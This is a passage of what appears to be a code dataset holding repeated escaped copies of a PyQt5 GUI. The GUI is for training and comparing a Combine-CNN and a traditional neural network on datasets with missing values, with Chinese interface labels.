QMessageBox.Yes, QMessageBox.Yes)\n elif self.sender() is self.saveModelButtonT:\n if self.trann is None:\n reply = QMessageBox.information(self, '模型错误', '模型不存在',\n QMessageBox.Yes, QMessageBox.Yes)\n return\n else:\n fname, ok = QFileDialog.getSaveFileName(self, 'Save Model',\n '..\\\\traditionalNN.trann.json',\n 'Traditional NN json files (*.trann.json)')\n if ok:\n succeed = self.trann.saveModel(fname)\n if succeed:\n reply = QMessageBox.information(self, '保存结果',\n '模型保存成功', QMessageBox.Yes, QMessageBox.Yes)\n else:\n reply = QMessageBox.information(self, '保存结果',\n '模型保存失败', QMessageBox.Yes, QMessageBox.Yes)\n else:\n reply = QMessageBox.information(self, '保存结果', '模型保存失败',\n QMessageBox.Yes, QMessageBox.Yes)\n\n def loadModel(self):\n if self.sender() is self.loadModelButton:\n fname, ok = QFileDialog.getOpenFileName(self, 'Load Model',\n '..', 'Combine-CNN json files (*.cbcnn.json)')\n if ok:\n if self.mcbcnn is None:\n self.mcbcnn = myCombineCNN.myCombineCNN(None, self.\n combineNumConv, self.convCoreNum, self.\n combineNumPooling)\n succeed = self.mcbcnn.setModel(fname)\n if succeed:\n modelName = fname.split('/')[-1].split('.')[0]\n self.presentModelName.setText(modelName)\n reply = QMessageBox.information(self, '设置结果', '模型设置成功',\n QMessageBox.Yes, QMessageBox.Yes)\n else:\n reply = QMessageBox.information(self, '设置结果', '模型设置失败',\n QMessageBox.Yes, QMessageBox.Yes)\n else:\n reply = QMessageBox.information(self, '设置结果', '模型设置失败',\n QMessageBox.Yes, QMessageBox.Yes)\n elif self.sender() is self.loadModelButtonT:\n fname, ok = QFileDialog.getOpenFileName(self, 'Load Model',\n '..', 'Traditional NN json files (*.trann.json)')\n if ok:\n if self.trann is None:\n self.trann = traditionalNN.traditionalNN(None)\n succeed = self.trann.setModel(fname)\n if succeed:\n modelName = fname.split('/')[-1].split('.')[0]\n self.presentModelNameT.setText(modelName)\n reply = QMessageBox.information(self, '设置结果', '模型设置成功',\n QMessageBox.Yes, QMessageBox.Yes)\n else:\n reply = QMessageBox.information(self, '设置结果', '模型设置失败',\n QMessageBox.Yes, QMessageBox.Yes)\n else:\n reply = QMessageBox.information(self, '设置结果', '模型设置失败',\n QMessageBox.Yes, QMessageBox.Yes)\n return\n\n def showResult(self):\n if self.sender() is self.showResultButton:\n if self.traingWidgetOnFlag['New']:\n reply = QMessageBox.information(self, '提示', '训练正在进行',\n QMessageBox.Yes, QMessageBox.Yes)\n return\n self.showResultW = showResultWidget.ShowResultWidget(\n 'combine-CNN预测结果展示', self, 'New')\n elif self.sender() is self.showResultButtonT:\n if self.traingWidgetOnFlag['Tra']:\n reply = QMessageBox.information(self, '提示', '训练正在进行',\n QMessageBox.Yes, QMessageBox.Yes)\n return\n self.showResultW = showResultWidget.ShowResultWidget(\n 'traditional NN预测结果展示', self, 'Tra')\n return\n\n def showJudge(self):\n if self.sender() is self.judgeResultButton:\n if self.traingWidgetOnFlag['New']:\n reply = QMessageBox.information(self, '提示', '训练正在进行',\n QMessageBox.Yes, QMessageBox.Yes)\n return\n self.chooseJDWin = (chooseJudgeDataSetWidget.\n chooseJudgeDataSetWidget(\n 'Choose Judgement-based-on Data Set', self, 'New'))\n elif self.sender() is self.judgeResultButtonT:\n if self.traingWidgetOnFlag['Tra']:\n reply = QMessageBox.information(self, '提示', '训练正在进行',\n QMessageBox.Yes, QMessageBox.Yes)\n return\n self.chooseJDWin = (chooseJudgeDataSetWidget.\n chooseJudgeDataSetWidget(\n 'Choose Judgement-based-on Data Set', self, 'Tra'))\n\n\nif __name__ == '__main__':\n app = QApplication(sys.argv)\n myMainWindow = MyMainWindow()\n sys.exit(app.exec_())\n", "<import token>\n\n\nclass MyMainWindow(QMainWindow):\n\n def __init__(self):\n super().__init__()\n self.windowLength = 1250\n self.windowHigh = 900\n self.fname = dict()\n self.fname['New'] = None\n self.fname['Tra'] = None\n self.dataLossRate = dict()\n self.dataSetLossValue = dict()\n self.dataFor = dict()\n self.dataFor['New'] = None\n self.dataLossRate['New'] = 0.0\n self.dataSetLossValue['New'] = 0.0\n self.dataFor['Tra'] = None\n self.dataLossRate['Tra'] = 0.0\n self.dataSetLossValue['Tra'] = 0.0\n self.traingWidgetOnFlag = dict()\n self.traingWidgetOnFlag['New'] = False\n self.traingWidgetOnFlag['Tra'] = False\n self.combineNumConv = 2\n self.convCoreNum = 5\n self.combineNumPooling = 4\n self.fullConnectOutInRate = 0.5\n self.mcbcnn = None\n self.trann = None\n self.trainingW = None\n self.trainingWT = None\n self.initUI()\n self.initConnect()\n\n def initUI(self):\n self.statusBar().showMessage('Ready')\n dataModule = QVBoxLayout()\n self.dataFileChooseButton = QPushButton('选择数据')\n self.dataFileChooseButton.setFont(QFont('微软雅黑', 16))\n self.dataLossSimulateSettingButton = QPushButton('设置数据缺失参数')\n self.dataLossSimulateSettingButton.setFont(QFont('微软雅黑', 16))\n self.dataShowButton = QPushButton('展示数据')\n self.dataShowButton.setFont(QFont('微软雅黑', 16))\n label = QLabel('Present Data:')\n label.setFont(QFont('微软雅黑', 16))\n self.presentDataName = QLabel('None')\n self.presentDataName.setFont(QFont('微软雅黑', 16))\n labelbox = QVBoxLayout()\n labelbox.addWidget(label)\n labelbox.addWidget(self.presentDataName)\n dataModule.addStretch(1)\n dataModule.addLayout(labelbox)\n dataModule.addStretch(1)\n dataModule.addWidget(self.dataFileChooseButton)\n dataModule.addStretch(1)\n dataModule.addWidget(self.dataLossSimulateSettingButton)\n dataModule.addStretch(1)\n dataModule.addWidget(self.dataShowButton)\n dataModule.addStretch(1)\n trainingModule = QVBoxLayout()\n self.setModelParametersButton = QPushButton('Model Parameters')\n self.setModelParametersButton.setFont(QFont('微软雅黑', 16))\n self.trainingButton = QPushButton('Training')\n self.trainingButton.setFont(QFont('微软雅黑', 16))\n self.saveModelButton = QPushButton('Save Model')\n self.saveModelButton.setFont(QFont('微软雅黑', 16))\n self.loadModelButton = QPushButton('Load Model')\n self.loadModelButton.setFont(QFont('微软雅黑', 16))\n label = QLabel('Present Model:')\n label.setFont(QFont('微软雅黑', 16))\n self.presentModelName = QLabel('None')\n self.presentModelName.setFont(QFont('微软雅黑', 16))\n labelbox = QVBoxLayout()\n labelbox.addWidget(label)\n labelbox.addWidget(self.presentModelName)\n trainingModule.addStretch(1)\n trainingModule.addLayout(labelbox)\n trainingModule.addStretch(1)\n trainingModule.addWidget(self.setModelParametersButton)\n trainingModule.addStretch(1)\n trainingModule.addWidget(self.trainingButton)\n trainingModule.addStretch(1)\n trainingModule.addWidget(self.saveModelButton)\n trainingModule.addStretch(1)\n trainingModule.addWidget(self.loadModelButton)\n trainingModule.addStretch(1)\n resultShowModule = QVBoxLayout()\n self.showResultButton = QPushButton('分类结果展示')\n self.showResultButton.setFont(QFont('微软雅黑', 16))\n self.judgeResultButton = QPushButton('分类结果评估')\n self.judgeResultButton.setFont(QFont('微软雅黑', 16))\n resultShowModule.addWidget(self.showResultButton)\n resultShowModule.addWidget(self.judgeResultButton)\n hboxTop = QHBoxLayout()\n hboxTop.addStretch(1)\n mcnnLabel = QLabel('Combine-CNN:')\n mcnnLabel.setFont(QFont('微软雅黑', 24, QFont.Bold))\n hboxTop.addWidget(mcnnLabel)\n hboxTop.addStretch(1)\n hboxTop.addLayout(dataModule)\n hboxTop.addStretch(1)\n hboxTop.addLayout(trainingModule)\n hboxTop.addStretch(1)\n hboxTop.addLayout(resultShowModule)\n hboxTop.addStretch(1)\n dataModuleT = QVBoxLayout()\n self.dataFileChooseButtonT = QPushButton('选择数据')\n self.dataFileChooseButtonT.setFont(QFont('微软雅黑', 16))\n self.dataLossSimulateSettingButtonT = QPushButton('设置数据缺失参数')\n self.dataLossSimulateSettingButtonT.setFont(QFont('微软雅黑', 16))\n self.dataPreProcessButtonT = QPushButton('数据预处理')\n self.dataPreProcessButtonT.setFont(QFont('微软雅黑', 16))\n self.dataShowButtonT = QPushButton('展示数据')\n self.dataShowButtonT.setFont(QFont('微软雅黑', 16))\n label = QLabel('Present Data:')\n label.setFont(QFont('微软雅黑', 16))\n self.presentDataNameT = QLabel('None')\n self.presentDataNameT.setFont(QFont('微软雅黑', 16))\n labelbox = QVBoxLayout()\n labelbox.addWidget(label)\n labelbox.addWidget(self.presentDataNameT)\n dataModuleT.addStretch(1)\n dataModuleT.addLayout(labelbox)\n dataModuleT.addStretch(1)\n dataModuleT.addWidget(self.dataFileChooseButtonT)\n dataModuleT.addStretch(1)\n dataModuleT.addWidget(self.dataLossSimulateSettingButtonT)\n dataModuleT.addStretch(1)\n dataModuleT.addWidget(self.dataPreProcessButtonT)\n dataModuleT.addStretch(1)\n dataModuleT.addWidget(self.dataShowButtonT)\n dataModuleT.addStretch(1)\n trainingModuleT = QVBoxLayout()\n self.setModelParametersButtonT = QPushButton('Model Parameters')\n self.setModelParametersButtonT.setFont(QFont('微软雅黑', 16))\n self.trainingButtonT = QPushButton('Training')\n self.trainingButtonT.setFont(QFont('微软雅黑', 16))\n self.saveModelButtonT = QPushButton('Save Model')\n self.saveModelButtonT.setFont(QFont('微软雅黑', 16))\n self.loadModelButtonT = QPushButton('Load Model')\n self.loadModelButtonT.setFont(QFont('微软雅黑', 16))\n label = QLabel('Present Model:')\n label.setFont(QFont('微软雅黑', 16))\n self.presentModelNameT = QLabel('None')\n self.presentModelNameT.setFont(QFont('微软雅黑', 16))\n labelbox = QVBoxLayout()\n labelbox.addWidget(label)\n labelbox.addWidget(self.presentModelNameT)\n trainingModuleT.addStretch(1)\n trainingModuleT.addLayout(labelbox)\n trainingModuleT.addStretch(1)\n trainingModuleT.addWidget(self.setModelParametersButtonT)\n trainingModuleT.addStretch(1)\n trainingModuleT.addWidget(self.trainingButtonT)\n trainingModuleT.addStretch(1)\n trainingModuleT.addWidget(self.saveModelButtonT)\n trainingModuleT.addStretch(1)\n trainingModuleT.addWidget(self.loadModelButtonT)\n trainingModuleT.addStretch(1)\n resultShowModuleT = QVBoxLayout()\n self.showResultButtonT = QPushButton('分类结果展示')\n self.showResultButtonT.setFont(QFont('微软雅黑', 16))\n self.judgeResultButtonT = QPushButton('分类结果评估')\n self.judgeResultButtonT.setFont(QFont('微软雅黑', 16))\n resultShowModuleT.addWidget(self.showResultButtonT)\n resultShowModuleT.addWidget(self.judgeResultButtonT)\n hboxBottom = QHBoxLayout(self)\n hboxBottom.addStretch(1)\n traditionNNLabel = QLabel('Traditional NN:')\n traditionNNLabel.setFont(QFont('微软雅黑', 24, QFont.Bold))\n hboxBottom.addWidget(traditionNNLabel)\n hboxBottom.addStretch(1)\n hboxBottom.addLayout(dataModuleT)\n hboxBottom.addStretch(1)\n hboxBottom.addLayout(trainingModuleT)\n hboxBottom.addStretch(1)\n hboxBottom.addLayout(resultShowModuleT)\n hboxBottom.addStretch(1)\n splitterLine = QLabel(self)\n splitterLine.setFont(QFont('Times', 1))\n col = QColor(0, 0, 0)\n splitterLine.setStyleSheet('QWidget { background-color: %s }' % col\n .name())\n splitterLine.resize(splitterLine.sizeHint())\n vbox = QVBoxLayout()\n vbox.addLayout(hboxTop)\n vbox.addWidget(splitterLine)\n vbox.addLayout(hboxBottom)\n mainWidget = QWidget()\n mainWidget.setLayout(vbox)\n self.setCentralWidget(mainWidget)\n self.setGeometry(350, 100, self.windowLength, self.windowHigh)\n self.setWindowTitle('适用于有缺失值数据集的神经网络系统')\n self.show()\n\n def initConnect(self):\n self.dataFileChooseButton.clicked.connect(self.chooseData)\n self.dataFileChooseButtonT.clicked.connect(self.chooseData)\n self.dataLossSimulateSettingButton.clicked.connect(self.\n setLossParameter)\n self.dataLossSimulateSettingButtonT.clicked.connect(self.\n setLossParameter)\n self.dataShowButton.clicked.connect(self.showData)\n self.dataShowButtonT.clicked.connect(self.showData)\n self.dataPreProcessButtonT.clicked.connect(self.preProcess)\n self.setModelParametersButton.clicked.connect(self.setModelParameters)\n self.setModelParametersButtonT.clicked.connect(self.setModelParameters)\n self.trainingButton.clicked.connect(self.training)\n self.trainingButtonT.clicked.connect(self.training)\n self.saveModelButton.clicked.connect(self.saveModel)\n self.saveModelButtonT.clicked.connect(self.saveModel)\n self.loadModelButton.clicked.connect(self.loadModel)\n self.loadModelButtonT.clicked.connect(self.loadModel)\n self.showResultButton.clicked.connect(self.showResult)\n self.showResultButtonT.clicked.connect(self.showResult)\n self.judgeResultButton.clicked.connect(self.showJudge)\n self.judgeResultButtonT.clicked.connect(self.showJudge)\n\n def chooseData(self):\n if self.sender() is self.dataFileChooseButton:\n self.fname['New'], ok = QFileDialog.getOpenFileName(self,\n 'Open file', '..', 'Text files (*.txt)')\n if ok:\n self.loadData()\n elif self.sender() is self.dataFileChooseButtonT:\n self.fname['Tra'], ok = QFileDialog.getOpenFileName(self,\n 'Open file', '..', 'Text files (*.txt)')\n if ok:\n self.loadData()\n return\n\n def loadData(self):\n if self.sender() is self.dataFileChooseButton:\n try:\n self.dataFor['New'] = myLoadData.loadData(self.fname['New'],\n self.dataLossRate['New'], self.dataSetLossValue['New'])\n except FileNotFoundError as e:\n reply = QMessageBox.information(self, 'Message',\n 'Data file not exist', QMessageBox.Yes, QMessageBox.Yes)\n return\n except Exception:\n reply = QMessageBox.information(self, 'Message',\n 'Data file format error', QMessageBox.Yes, QMessageBox.Yes)\n return\n dataname = self.fname['New'].split('/')[-1].split('.')[0]\n self.presentDataName.setText(dataname)\n self.presentDataName.resize(self.presentDataName.sizeHint())\n elif self.sender() is self.dataFileChooseButtonT:\n try:\n self.dataFor['Tra'] = myLoadData.loadData(self.fname['Tra'],\n self.dataLossRate['Tra'], self.dataSetLossValue['Tra'])\n except FileNotFoundError as e:\n reply = QMessageBox.information(self, 'Message',\n 'Data file not exist', QMessageBox.Yes, QMessageBox.Yes)\n return\n except Exception:\n reply = QMessageBox.information(self, 'Message',\n 'Data file format error', QMessageBox.Yes, QMessageBox.Yes)\n return\n dataname = self.fname['Tra'].split('/')[-1].split('.')[0]\n self.presentDataNameT.setText(dataname)\n self.presentDataNameT.resize(self.presentDataNameT.sizeHint())\n return\n\n def setLossParameter(self):\n if self.sender() is self.dataLossSimulateSettingButton:\n self.setLPDialog = setLossParameterDialog.setLossParameterDialog(\n 'combine-CNN设置缺失参数', self, 'New')\n elif self.sender() is self.dataLossSimulateSettingButtonT:\n self.setLPDialog = setLossParameterDialog.setLossParameterDialog(\n 'traditional NN设置缺失参数', self, 'Tra')\n return\n\n def showData(self):\n if self.sender() is self.dataShowButton:\n self.showDataW = showDataWidget.ShowDataWidget('combine-CNN数据展示',\n self, 'New')\n elif self.sender() is self.dataShowButtonT:\n self.showDataW = showDataWidget.ShowDataWidget('traditional NN数据展示'\n , self, 'Tra')\n return\n\n def preProcess(self):\n if self.dataFor['Tra'] is None:\n reply = QMessageBox.information(self, '数据错误', '没有加载数据,无法预处理',\n QMessageBox.Yes, QMessageBox.Yes)\n else:\n self.dataFor['Tra'].MeanPreProcess()\n reply = QMessageBox.information(self, 'Message',\n 'PreProcess succeed!', QMessageBox.Yes, QMessageBox.Yes)\n return\n\n def setModelParameters(self):\n if self.sender() is self.setModelParametersButton:\n self.setModelParaW = (setModelParametersDialog.\n setLossParameterDialog('combine-CNN模型参数设置', self, 'New'))\n elif self.sender() is self.setModelParametersButtonT:\n self.setModelParaW = (setModelParametersDialog.\n setLossParameterDialog('traditional NN模型参数设置', self, 'Tra'))\n\n def training(self):\n if self.sender() is self.trainingButton:\n if self.trainingW is not None:\n self.trainingW.hide()\n self.trainingW.show()\n return\n senderName = 'New'\n elif self.sender() is self.trainingButtonT:\n if self.trainingWT is not None:\n self.trainingWT.hide()\n self.trainingWT.show()\n senderName = 'Tra'\n if self.dataFor[senderName] is None:\n reply = QMessageBox.information(self, '数据错误', '没有加载数据,无法训练',\n QMessageBox.Yes, QMessageBox.Yes)\n return\n elif senderName == 'New':\n if self.dataFor[senderName].DataTrainX.shape[1\n ] < self.combineNumConv:\n reply = QMessageBox.information(self, '参数错误',\n '卷积层组合(卷积核)大小大于数据集特征数量', QMessageBox.Yes, QMessageBox.Yes)\n return\n if combineNumCalculate.combineNumCal(self.dataFor[senderName].\n DataTrainX.shape[1], self.combineNumConv\n ) < self.combineNumPooling:\n reply = QMessageBox.information(self, '参数错误',\n '池化层组合(池化核)大小大于卷积层输出特征向量维度', QMessageBox.Yes,\n QMessageBox.Yes)\n return\n if self.trainingWT is not None:\n reply = QMessageBox.information(self, '提示',\n 'traditional NN训练正在进行,请等待其结束', QMessageBox.Yes,\n QMessageBox.Yes)\n return\n self.trainingW = TrainingWidget.trainningWidget('combine-CNN训练',\n self, senderName)\n self.traingWidgetOnFlag[senderName] = False\n elif senderName == 'Tra':\n if self.trainingW is not None:\n reply = QMessageBox.information(self, '提示',\n 'combine-CNN训练正在进行,请等待其结束', QMessageBox.Yes,\n QMessageBox.Yes)\n return\n self.trainingWT = TrainingWidget.trainningWidget('traditional NN训练'\n , self, senderName)\n self.traingWidgetOnFlag[senderName] = False\n return\n\n def saveModel(self):\n if self.sender() is self.saveModelButton:\n if self.mcbcnn is None:\n reply = QMessageBox.information(self, '模型错误', '模型不存在',\n QMessageBox.Yes, QMessageBox.Yes)\n return\n else:\n fname, ok = QFileDialog.getSaveFileName(self, 'Save Model',\n '..\\\\myCombineCNN.cbcnn.json',\n 'Combine-CNN json files (*.cbcnn.json)')\n if ok:\n succeed = self.mcbcnn.saveModel(fname)\n if succeed:\n reply = QMessageBox.information(self, '保存结果',\n '模型保存成功', QMessageBox.Yes, QMessageBox.Yes)\n else:\n reply = QMessageBox.information(self, '保存结果',\n '模型保存失败', QMessageBox.Yes, QMessageBox.Yes)\n else:\n reply = QMessageBox.information(self, '保存结果', '模型保存失败',\n QMessageBox.Yes, QMessageBox.Yes)\n elif self.sender() is self.saveModelButtonT:\n if self.trann is None:\n reply = QMessageBox.information(self, '模型错误', '模型不存在',\n QMessageBox.Yes, QMessageBox.Yes)\n return\n else:\n fname, ok = QFileDialog.getSaveFileName(self, 'Save Model',\n '..\\\\traditionalNN.trann.json',\n 'Traditional NN json files (*.trann.json)')\n if ok:\n succeed = self.trann.saveModel(fname)\n if succeed:\n reply = QMessageBox.information(self, '保存结果',\n '模型保存成功', QMessageBox.Yes, QMessageBox.Yes)\n else:\n reply = QMessageBox.information(self, '保存结果',\n '模型保存失败', QMessageBox.Yes, QMessageBox.Yes)\n else:\n reply = QMessageBox.information(self, '保存结果', '模型保存失败',\n QMessageBox.Yes, QMessageBox.Yes)\n\n def loadModel(self):\n if self.sender() is self.loadModelButton:\n fname, ok = QFileDialog.getOpenFileName(self, 'Load Model',\n '..', 'Combine-CNN json files (*.cbcnn.json)')\n if ok:\n if self.mcbcnn is None:\n self.mcbcnn = myCombineCNN.myCombineCNN(None, self.\n combineNumConv, self.convCoreNum, self.\n combineNumPooling)\n succeed = self.mcbcnn.setModel(fname)\n if succeed:\n modelName = fname.split('/')[-1].split('.')[0]\n self.presentModelName.setText(modelName)\n reply = QMessageBox.information(self, '设置结果', '模型设置成功',\n QMessageBox.Yes, QMessageBox.Yes)\n else:\n reply = QMessageBox.information(self, '设置结果', '模型设置失败',\n QMessageBox.Yes, QMessageBox.Yes)\n else:\n reply = QMessageBox.information(self, '设置结果', '模型设置失败',\n QMessageBox.Yes, QMessageBox.Yes)\n elif self.sender() is self.loadModelButtonT:\n fname, ok = QFileDialog.getOpenFileName(self, 'Load Model',\n '..', 'Traditional NN json files (*.trann.json)')\n if ok:\n if self.trann is None:\n self.trann = traditionalNN.traditionalNN(None)\n succeed = self.trann.setModel(fname)\n if succeed:\n modelName = fname.split('/')[-1].split('.')[0]\n self.presentModelNameT.setText(modelName)\n reply = QMessageBox.information(self, '设置结果', '模型设置成功',\n QMessageBox.Yes, QMessageBox.Yes)\n else:\n reply = QMessageBox.information(self, '设置结果', '模型设置失败',\n QMessageBox.Yes, QMessageBox.Yes)\n else:\n reply = QMessageBox.information(self, '设置结果', '模型设置失败',\n QMessageBox.Yes, QMessageBox.Yes)\n return\n\n def showResult(self):\n if self.sender() is self.showResultButton:\n if self.traingWidgetOnFlag['New']:\n reply = QMessageBox.information(self, '提示', '训练正在进行',\n QMessageBox.Yes, QMessageBox.Yes)\n return\n self.showResultW = showResultWidget.ShowResultWidget(\n 'combine-CNN预测结果展示', self, 'New')\n elif self.sender() is self.showResultButtonT:\n if self.traingWidgetOnFlag['Tra']:\n reply = QMessageBox.information(self, '提示', '训练正在进行',\n QMessageBox.Yes, QMessageBox.Yes)\n return\n self.showResultW = showResultWidget.ShowResultWidget(\n 'traditional NN预测结果展示', self, 'Tra')\n return\n\n def showJudge(self):\n if self.sender() is self.judgeResultButton:\n if self.traingWidgetOnFlag['New']:\n reply = QMessageBox.information(self, '提示', '训练正在进行',\n QMessageBox.Yes, QMessageBox.Yes)\n return\n self.chooseJDWin = (chooseJudgeDataSetWidget.\n chooseJudgeDataSetWidget(\n 'Choose Judgement-based-on Data Set', self, 'New'))\n elif self.sender() is self.judgeResultButtonT:\n if self.traingWidgetOnFlag['Tra']:\n reply = QMessageBox.information(self, '提示', '训练正在进行',\n QMessageBox.Yes, QMessageBox.Yes)\n return\n self.chooseJDWin = (chooseJudgeDataSetWidget.\n chooseJudgeDataSetWidget(\n 'Choose Judgement-based-on Data Set', self, 'Tra'))\n\n\nif __name__ == '__main__':\n app = QApplication(sys.argv)\n myMainWindow = MyMainWindow()\n sys.exit(app.exec_())\n", "<import token>\n\n\nclass MyMainWindow(QMainWindow):\n\n def __init__(self):\n super().__init__()\n self.windowLength = 1250\n self.windowHigh = 900\n self.fname = dict()\n self.fname['New'] = None\n self.fname['Tra'] = None\n self.dataLossRate = dict()\n self.dataSetLossValue = dict()\n self.dataFor = dict()\n self.dataFor['New'] = None\n self.dataLossRate['New'] = 0.0\n self.dataSetLossValue['New'] = 0.0\n self.dataFor['Tra'] = None\n self.dataLossRate['Tra'] = 0.0\n self.dataSetLossValue['Tra'] = 0.0\n self.traingWidgetOnFlag = dict()\n self.traingWidgetOnFlag['New'] = False\n self.traingWidgetOnFlag['Tra'] = False\n self.combineNumConv = 2\n self.convCoreNum = 5\n self.combineNumPooling = 4\n self.fullConnectOutInRate = 0.5\n self.mcbcnn = None\n self.trann = None\n self.trainingW = None\n self.trainingWT = None\n self.initUI()\n self.initConnect()\n\n def initUI(self):\n self.statusBar().showMessage('Ready')\n dataModule = QVBoxLayout()\n self.dataFileChooseButton = QPushButton('选择数据')\n self.dataFileChooseButton.setFont(QFont('微软雅黑', 16))\n self.dataLossSimulateSettingButton = QPushButton('设置数据缺失参数')\n self.dataLossSimulateSettingButton.setFont(QFont('微软雅黑', 16))\n self.dataShowButton = QPushButton('展示数据')\n self.dataShowButton.setFont(QFont('微软雅黑', 16))\n label = QLabel('Present Data:')\n label.setFont(QFont('微软雅黑', 16))\n self.presentDataName = QLabel('None')\n self.presentDataName.setFont(QFont('微软雅黑', 16))\n labelbox = QVBoxLayout()\n labelbox.addWidget(label)\n labelbox.addWidget(self.presentDataName)\n dataModule.addStretch(1)\n dataModule.addLayout(labelbox)\n dataModule.addStretch(1)\n dataModule.addWidget(self.dataFileChooseButton)\n dataModule.addStretch(1)\n dataModule.addWidget(self.dataLossSimulateSettingButton)\n dataModule.addStretch(1)\n dataModule.addWidget(self.dataShowButton)\n dataModule.addStretch(1)\n trainingModule = QVBoxLayout()\n self.setModelParametersButton = QPushButton('Model Parameters')\n self.setModelParametersButton.setFont(QFont('微软雅黑', 16))\n self.trainingButton = QPushButton('Training')\n self.trainingButton.setFont(QFont('微软雅黑', 16))\n self.saveModelButton = QPushButton('Save Model')\n self.saveModelButton.setFont(QFont('微软雅黑', 16))\n self.loadModelButton = QPushButton('Load Model')\n self.loadModelButton.setFont(QFont('微软雅黑', 16))\n label = QLabel('Present Model:')\n label.setFont(QFont('微软雅黑', 16))\n self.presentModelName = QLabel('None')\n self.presentModelName.setFont(QFont('微软雅黑', 16))\n labelbox = QVBoxLayout()\n labelbox.addWidget(label)\n labelbox.addWidget(self.presentModelName)\n trainingModule.addStretch(1)\n trainingModule.addLayout(labelbox)\n trainingModule.addStretch(1)\n trainingModule.addWidget(self.setModelParametersButton)\n trainingModule.addStretch(1)\n trainingModule.addWidget(self.trainingButton)\n trainingModule.addStretch(1)\n trainingModule.addWidget(self.saveModelButton)\n trainingModule.addStretch(1)\n trainingModule.addWidget(self.loadModelButton)\n trainingModule.addStretch(1)\n resultShowModule = QVBoxLayout()\n self.showResultButton = QPushButton('分类结果展示')\n self.showResultButton.setFont(QFont('微软雅黑', 16))\n self.judgeResultButton = QPushButton('分类结果评估')\n self.judgeResultButton.setFont(QFont('微软雅黑', 16))\n resultShowModule.addWidget(self.showResultButton)\n resultShowModule.addWidget(self.judgeResultButton)\n hboxTop = QHBoxLayout()\n hboxTop.addStretch(1)\n mcnnLabel = QLabel('Combine-CNN:')\n mcnnLabel.setFont(QFont('微软雅黑', 24, QFont.Bold))\n hboxTop.addWidget(mcnnLabel)\n hboxTop.addStretch(1)\n hboxTop.addLayout(dataModule)\n hboxTop.addStretch(1)\n hboxTop.addLayout(trainingModule)\n hboxTop.addStretch(1)\n hboxTop.addLayout(resultShowModule)\n hboxTop.addStretch(1)\n dataModuleT = QVBoxLayout()\n self.dataFileChooseButtonT = QPushButton('选择数据')\n self.dataFileChooseButtonT.setFont(QFont('微软雅黑', 16))\n self.dataLossSimulateSettingButtonT = QPushButton('设置数据缺失参数')\n self.dataLossSimulateSettingButtonT.setFont(QFont('微软雅黑', 16))\n self.dataPreProcessButtonT = QPushButton('数据预处理')\n self.dataPreProcessButtonT.setFont(QFont('微软雅黑', 16))\n self.dataShowButtonT = QPushButton('展示数据')\n self.dataShowButtonT.setFont(QFont('微软雅黑', 16))\n label = QLabel('Present Data:')\n label.setFont(QFont('微软雅黑', 16))\n self.presentDataNameT = QLabel('None')\n self.presentDataNameT.setFont(QFont('微软雅黑', 16))\n labelbox = QVBoxLayout()\n labelbox.addWidget(label)\n labelbox.addWidget(self.presentDataNameT)\n dataModuleT.addStretch(1)\n dataModuleT.addLayout(labelbox)\n dataModuleT.addStretch(1)\n dataModuleT.addWidget(self.dataFileChooseButtonT)\n dataModuleT.addStretch(1)\n dataModuleT.addWidget(self.dataLossSimulateSettingButtonT)\n dataModuleT.addStretch(1)\n dataModuleT.addWidget(self.dataPreProcessButtonT)\n dataModuleT.addStretch(1)\n dataModuleT.addWidget(self.dataShowButtonT)\n dataModuleT.addStretch(1)\n trainingModuleT = QVBoxLayout()\n self.setModelParametersButtonT = QPushButton('Model Parameters')\n self.setModelParametersButtonT.setFont(QFont('微软雅黑', 16))\n self.trainingButtonT = QPushButton('Training')\n self.trainingButtonT.setFont(QFont('微软雅黑', 16))\n self.saveModelButtonT = QPushButton('Save Model')\n self.saveModelButtonT.setFont(QFont('微软雅黑', 16))\n self.loadModelButtonT = QPushButton('Load Model')\n self.loadModelButtonT.setFont(QFont('微软雅黑', 16))\n label = QLabel('Present Model:')\n label.setFont(QFont('微软雅黑', 16))\n self.presentModelNameT = QLabel('None')\n self.presentModelNameT.setFont(QFont('微软雅黑', 16))\n labelbox = QVBoxLayout()\n labelbox.addWidget(label)\n labelbox.addWidget(self.presentModelNameT)\n trainingModuleT.addStretch(1)\n trainingModuleT.addLayout(labelbox)\n trainingModuleT.addStretch(1)\n trainingModuleT.addWidget(self.setModelParametersButtonT)\n trainingModuleT.addStretch(1)\n trainingModuleT.addWidget(self.trainingButtonT)\n trainingModuleT.addStretch(1)\n trainingModuleT.addWidget(self.saveModelButtonT)\n trainingModuleT.addStretch(1)\n trainingModuleT.addWidget(self.loadModelButtonT)\n trainingModuleT.addStretch(1)\n resultShowModuleT = QVBoxLayout()\n self.showResultButtonT = QPushButton('分类结果展示')\n self.showResultButtonT.setFont(QFont('微软雅黑', 16))\n self.judgeResultButtonT = QPushButton('分类结果评估')\n self.judgeResultButtonT.setFont(QFont('微软雅黑', 16))\n resultShowModuleT.addWidget(self.showResultButtonT)\n resultShowModuleT.addWidget(self.judgeResultButtonT)\n hboxBottom = QHBoxLayout(self)\n hboxBottom.addStretch(1)\n traditionNNLabel = QLabel('Traditional NN:')\n traditionNNLabel.setFont(QFont('微软雅黑', 24, QFont.Bold))\n hboxBottom.addWidget(traditionNNLabel)\n hboxBottom.addStretch(1)\n hboxBottom.addLayout(dataModuleT)\n hboxBottom.addStretch(1)\n hboxBottom.addLayout(trainingModuleT)\n hboxBottom.addStretch(1)\n hboxBottom.addLayout(resultShowModuleT)\n hboxBottom.addStretch(1)\n splitterLine = QLabel(self)\n splitterLine.setFont(QFont('Times', 1))\n col = QColor(0, 0, 0)\n splitterLine.setStyleSheet('QWidget { background-color: %s }' % col\n .name())\n splitterLine.resize(splitterLine.sizeHint())\n vbox = QVBoxLayout()\n vbox.addLayout(hboxTop)\n vbox.addWidget(splitterLine)\n vbox.addLayout(hboxBottom)\n mainWidget = QWidget()\n mainWidget.setLayout(vbox)\n self.setCentralWidget(mainWidget)\n self.setGeometry(350, 100, self.windowLength, self.windowHigh)\n self.setWindowTitle('适用于有缺失值数据集的神经网络系统')\n self.show()\n\n def initConnect(self):\n self.dataFileChooseButton.clicked.connect(self.chooseData)\n self.dataFileChooseButtonT.clicked.connect(self.chooseData)\n self.dataLossSimulateSettingButton.clicked.connect(self.\n setLossParameter)\n self.dataLossSimulateSettingButtonT.clicked.connect(self.\n setLossParameter)\n self.dataShowButton.clicked.connect(self.showData)\n self.dataShowButtonT.clicked.connect(self.showData)\n self.dataPreProcessButtonT.clicked.connect(self.preProcess)\n self.setModelParametersButton.clicked.connect(self.setModelParameters)\n self.setModelParametersButtonT.clicked.connect(self.setModelParameters)\n 